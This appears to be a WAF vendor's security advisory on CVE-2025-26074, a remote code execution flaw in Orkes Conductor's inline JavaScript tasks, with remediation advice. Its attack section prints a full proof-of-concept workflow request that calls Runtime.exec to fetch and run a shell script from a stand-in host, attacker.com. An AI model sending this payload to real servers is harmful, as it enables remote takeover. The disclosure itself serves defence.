CVE-2025-26074 is a high-risk remote code execution (RCE) vulnerability that allows attackers to execute commands directly on the server without authentication, posing a serious security threat.
In particular, if the attack code is inserted into the internal system operation workflow, it could lead to long-term backdoors and system control takeover, requiring immediate action.
AIWAF products plan to develop patterns to address vulnerabilities occurring within Orkes and will respond swiftly to any vulnerabilities discovered in the future.
1. Overview
Orkes Conductor is an open source workflow orchestration engine developed by Netflix, designed to define and automatically execute complex workflows in microservice-based systems.
It offers flexible configuration options, including JSON-based workflow definitions, REST APIs, and JavaScript Tasks.
In enterprise environments, it is widely used for DevOps, CI/CD, and backend service automation.
This report summarizes the analysis of a Remote Code Execution vulnerability discovered in the recent Orkes Conductor OSS v3.21.11 release.
Source : https://www.orkes.io/
2. Attack Type
CVE-2025-26074 is a remote code execution (RCE) vulnerability discovered in Orkes Conductor OSS v3.21.11, which occurs in the execution logic of Inline JavaScript Tasks within user-defined workflows. The root cause of this vulnerability lies in the inadequate security settings of the Nashorn JavaScript engine used to process JavaScript within the Java-based server.
Conductor OSS supports the direct writing of JavaScript to automate workflows and handle specific tasks.
While this feature is intended to enhance usability and flexibility, the JavaScript code is executed directly through the Nashorn engine internally, and by default, access to Java's native classes is not blocked.
In particular, when the --no-java option is not applied, JavaScript can directly access Java standard libraries such as java.lang.Runtime, java.lang.ProcessBuilder, and java.io.*.
An attacker could exploit this vulnerability by inserting malicious JavaScript code during workflow definition.
An attacker could insert the following script:
Example attack Request:
POST /api/metadata/workflow HTTP/1.1
Host: vulnerable-conductor.example.com
Content-Type: application/json
Authorization: Bearer <your_api_token>
{
"name": "exploit_inline_rce",
"description": "PoC for CVE-2025-26074 - RCE via inline JavaScript",
"version": 1,
"tasks": [
{
"name": "inline_rce_task",
"taskReferenceName": "rce_task",
"type": "INLINE",
"inputParameters": {
"evaluatorType": "javascript",
"expression": "var runtime = java.lang.Runtime.getRuntime(); runtime.exec('curl http://attacker.com/shell.sh | sh');"
}
}
],
"schemaVersion": 2
}
3. Response Measures
Orkes recommends upgrading to v3.21.13 or higher, disabling Inline Task, or setting Java access restrictions as a response to the CVE-2025-26074 vulnerability.
We will conduct additional analysis on our AIWAF products and respond accordingly.
4. Conclusion
CVE-2025-26074 is a high-risk RCE vulnerability that allows direct execution of commands on the server, posing a serious security threat as it can be exploited without authentication.
In particular, if attack code is inserted into internal system operation workflows, it could lead to long-term backdoors and system control takeover, necessitating swift action.
Our AIWAF product plans to develop patterns to address vulnerabilities occurring within Orkes and will continue to respond swiftly to any newly discovered vulnerabilities in the future.
5. References
